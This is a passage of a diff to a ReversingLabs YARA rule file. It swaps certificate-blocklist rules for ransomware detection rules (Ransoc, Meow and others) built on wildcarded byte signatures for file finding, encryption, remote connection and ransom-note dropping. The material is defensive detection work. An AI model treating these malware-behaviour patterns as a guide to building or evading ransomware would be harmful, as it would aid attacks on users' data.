6A ?? E8 ?? ?? ?? ?? 83 C4 + ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 68 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 85 C0 75 + } + $encrypt_files_p2 = { + E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 33 C9 + 85 F6 7E ?? 8D 56 ?? 53 8B 5C 24 ?? 03 D7 66 0F 1F 44 00 ?? 8A 04 19 8D 52 ?? 41 88 + 42 ?? 3B CE 7C ?? 5B 8D 44 24 ?? 89 74 24 ?? 50 8B 44 24 ?? 57 6A ?? 6A ?? 6A ?? FF + 70 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? + ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44 + 24 ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? FF 74 24 ?? 57 E8 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC + E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 74 24 ?? 56 57 55 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 8B C6 5F 5E 5D + 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 + } + $remote_connection_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? E8 ?? + ?? ?? ?? FF 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? + E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B D8 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 + C4 ?? 49 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? 83 3D ?? ?? + ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 89 41 ?? 8B F2 A1 ?? ?? ?? ?? 89 + 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 8A 02 42 84 C0 75 ?? 8D BD ?? + ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 + 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? + 8B F2 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 66 90 8A 02 42 84 + C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B + CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? + ?? ?? ?? 8B F3 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 8A 03 43 + 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B DE 4F 8A 47 ?? 47 84 C0 75 ?? 8B CB C1 E9 ?? F3 A5 + 8B CB 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? + ?? 8B 95 ?? ?? ?? ?? 8B F2 89 01 A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 0F + } + $remote_connection_p2 = { + 1F 44 00 ?? 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? + 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D + 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 + ?? A0 ?? ?? ?? ?? 6A ?? 88 41 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 45 + ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 51 ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? + ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85 + DB 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 + 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 56 + FF 15 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF B5 ?? ?? ?? ?? FF D7 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B + 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LLC \"IP EM\"" and pe.signatures[i].serial=="68:4f:47:8c:72:59:dd:e0:cf:e2:26:01:12:ca:98:46" and 1584981648<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0B7C32208A954A483Dd102E1Be094867 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Ransoc : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Ransoc ransomware." author = "ReversingLabs" - id = "d16e74d8-2c46-508b-b518-a542603ca726" - date = "2023-11-08" - modified = "2023-11-08" + id = "a990754e-eafa-5501-a123-bcbd5aa26ca6" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4014-L4030" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "49e2208a7d2b5684283c1dfc9856f864d16b50f951f58e0252c97419819a46ec" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Ransoc.yara#L1-L114" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1f48f1b713c18b099e863d8a11e872ae84df0ea355f01cba765e8333d8d98575" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Ransoc" + tc_detection_factor = 5 importance = 25 + strings: + $scan_for_services = { + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66 89 + 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 + E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 + C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 + ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66 + 89 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 + F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 66 39 2D ?? ?? + ?? ?? 73 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 66 01 1D ?? ?? ?? ?? 8B + FB 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? + ?? ?? 73 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 66 + 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? + EB ?? 85 FF 74 ?? 8D 44 24 ?? 50 E8 + } + $remote_connection = { + 8B 44 24 ?? 83 EC ?? 53 8B 5C 24 ?? 56 8B 74 24 ?? 50 56 E8 ?? ?? ?? ?? 8B D8 83 C4 + ?? 83 FB ?? 75 ?? 5E B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 4C 24 ?? 55 8B 6C 24 ?? 57 55 + 56 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 56 FF 15 ?? ?? ?? ?? 50 56 53 E8 + ?? ?? ?? ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8D + 47 ?? 5F 5D 5E 5B 83 C4 ?? C3 8B 44 24 ?? 85 C0 74 ?? 85 ED 74 ?? 55 50 53 E8 ?? ?? + ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B 83 C4 + ?? C3 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8D 49 ?? 8B 74 24 ?? + 8B C6 2B 44 24 ?? 75 ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 2B + 74 24 ?? 6A ?? 56 8D 54 24 ?? 56 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 53 FF D5 8B F8 85 FF + 78 ?? 2B C6 01 44 24 ?? EB ?? 29 74 24 ?? 83 FF ?? 74 ?? 85 FF 75 ?? 53 FF 15 ?? ?? + ?? ?? 85 FF 79 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B + 83 C4 ?? C3 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 68 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D + 8D 46 ?? 5E 5B 83 C4 ?? C3 8B 54 24 ?? 83 C2 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 4C 24 ?? + 8B 54 24 ?? 8B F8 8B 44 24 ?? 2B F0 83 C6 ?? 2B CE 51 03 F0 56 52 E8 ?? ?? ?? ?? 8D + 44 24 ?? 50 E8 + } + $encrypt_files = { + 81 EC ?? ?? ?? ?? 53 55 56 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? + 8B F8 FF D6 8B 8C 24 ?? ?? ?? ?? 8B E8 8B 84 24 ?? ?? ?? ?? 50 51 57 8D 94 24 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 + E8 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 83 C4 ?? 89 4C 24 ?? BB ?? + ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? EB ?? 8D 49 ?? 55 68 ?? ?? ?? ?? 83 FB ?? 7E ?? 8D + 94 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ?? ?? 52 F3 A5 E8 ?? ?? + ?? ?? 8B BC 24 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? EB ?? 8D 84 24 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? 83 C4 ?? 6A ?? 8D 4C 24 ?? 6A ?? 51 + E8 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 8D 44 24 ?? B9 ?? ?? ?? ?? 80 30 ?? 40 49 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 6A ?? + 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 51 8D + 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? + ?? ?? 83 C4 ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 8B FF 80 30 ?? 40 49 75 ?? 8D 54 24 ?? 52 + E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 8D + 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 54 24 + ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 83 FF ?? 72 ?? BE ?? ?? ?? ?? 8B 4C 24 ?? 56 8D + 44 24 ?? 50 51 E8 ?? ?? ?? ?? 01 74 24 ?? 2B FE 83 C4 ?? 43 89 BC 24 ?? ?? ?? ?? 85 + FF 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 + } + $find_files = { + 83 EC ?? 53 55 56 57 33 DB 68 ?? ?? ?? ?? 6A ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? + ?? 8B E8 8D 44 24 ?? 50 89 6C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 55 51 E8 ?? ?? ?? ?? + 8B 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 55 68 ?? ?? ?? + ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B F8 57 8D 54 24 ?? 52 8D 44 24 ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 3B C3 75 ?? 8B 4C 24 ?? 51 8D 54 24 ?? 52 E8 ?? ?? + ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? + ?? ?? 8B 44 24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 4C 24 ?? + 51 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ?? + ?? 83 C4 ?? 33 FF 39 5C 24 ?? 76 ?? 8D 64 24 ?? 8B 44 24 ?? 8B 0C B8 51 56 E8 ?? ?? + ?? ?? 47 83 C4 ?? 3B 7C 24 ?? 72 ?? 39 5C 24 ?? 75 ?? 8B 44 24 ?? 3B C3 74 ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ?? + ?? 8B 44 24 ?? 83 C4 ?? 89 5C 24 ?? 3B C3 0F 86 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ?? + 8B 44 24 ?? 8B 4C 24 ?? 8B 1C 88 53 55 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 57 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8B E8 E8 ?? ?? ?? ?? 6A ?? 56 89 44 24 ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 53 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 56 E8 ?? ?? ?? ?? 33 C0 8D 54 24 ?? 55 52 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84 + 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 + 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 44 24 ?? 50 56 + E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? + ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B D3 52 E8 ?? ?? + ?? ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 41 83 C4 ?? 89 4C 24 ?? 3B C8 0F 82 ?? ?? + ?? ?? 33 DB 33 F6 3B C3 76 ?? 8B 44 24 ?? 8B 0C B0 51 E8 ?? ?? ?? ?? 46 83 C4 ?? 3B + 74 24 ?? 72 ?? 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? + 3B C3 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 5F 5E 5D 3B C3 5B 74 ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 83 C4 ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Win Sp Z O O" and pe.signatures[i].serial=="0b:7c:32:20:8a:95:4a:48:3d:d1:02:e1:be:09:48:67" and 1583884800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $scan_for_services and $find_files and $encrypt_files and $remote_connection } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3E72Daf2B9A4449E946009E5084A8E76 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Meow : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Meow ransomware." author = "ReversingLabs" - id = "aa7c6cbe-0794-59e3-a675-93beeccc9784" - date = "2023-11-08" - modified = "2023-11-08" + id = "7cebb04d-1cda-5ad1-b412-8b38df7b2550" + date = "2022-10-24" + modified = "2022-10-24" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4032-L4048" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f1a7bf6c18e0ebf8aef53feb7d7789ce87c96e00962c64e07a37d968702d2fa5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Meow.yara#L1-L84" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b00753d2b150a815279297ddf40d70051d25de1c32bb90f5b706ea7fd36bb871" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Meow" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 72 ?? 8D 45 ?? BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 68 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 33 F6 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B4 B5 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C + ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 5F 5E 33 C0 5B 8B E5 5D C3 CC 55 8B EC 83 EC + ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? + ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? + ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? + ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ?? + 75 + } + $encrypt_files_p2 = { + 8B 45 ?? 40 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74 ?? E9 ?? ?? ?? ?? 8B 45 ?? 25 ?? ?? + ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 74 ?? 8B 4D ?? 8D 46 ?? 03 CF 0F AF C8 89 4D ?? 8B + 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 75 ?? B9 ?? ?? ?? ?? 90 8B 45 ?? 99 + F7 F9 8B 45 ?? 85 D2 74 ?? 48 EB ?? 40 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 + C8 ?? 83 C0 ?? 74 ?? EB ?? 8B 45 ?? B9 ?? ?? ?? ?? 99 F7 F9 85 D2 74 ?? 8B 45 ?? 8D + 4E ?? 83 C0 ?? 99 F7 F9 B9 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 75 ?? 8B 45 + ?? 99 F7 7D ?? 8B 45 ?? 85 D2 74 ?? 40 EB ?? 48 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74 + ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 FF + D0 C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 45 ?? 99 F7 F9 8B 45 ?? 85 D2 74 ?? 83 C0 + ?? 03 C3 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 0F 85 + } + $drop_ransom_note = { + 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 + FF 74 ?? 8B CF E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 74 ?? 6A + ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D0 6A ?? + 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A + ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 8B F0 BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 35 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF D0 B9 ?? ?? ?? ?? 8D BD ?? + ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? 50 66 A5 A4 E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 CD B8 ?? + ?? ?? ?? 5F 5B 5E E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $find_files = { + 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF + B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 + 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? 